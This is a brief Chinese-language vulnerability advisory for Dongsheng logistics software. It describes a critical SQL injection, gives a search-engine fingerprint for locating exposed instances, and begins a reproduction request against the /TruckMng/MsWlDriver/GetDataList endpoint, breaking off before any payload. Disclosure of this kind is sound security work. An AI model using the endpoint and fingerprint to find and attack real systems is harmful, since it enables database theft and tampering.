目录
0x01 产品简介
东胜物流软件是一款致力于为客户提供IT支撑的SOP,帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。
0x02 漏洞概述
东胜物流软件存在一个严重的 SQL 注入漏洞,攻击者可以通过在相关参数中注入恶意的 SQL 语句,导致数据库泄露、数据篡改或执行任意 SQL 查询。
0x03 网络测绘
fid="Z4c2hPCi5IR/AnH5vZXNSQ=="
0x04 漏洞复现
GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort&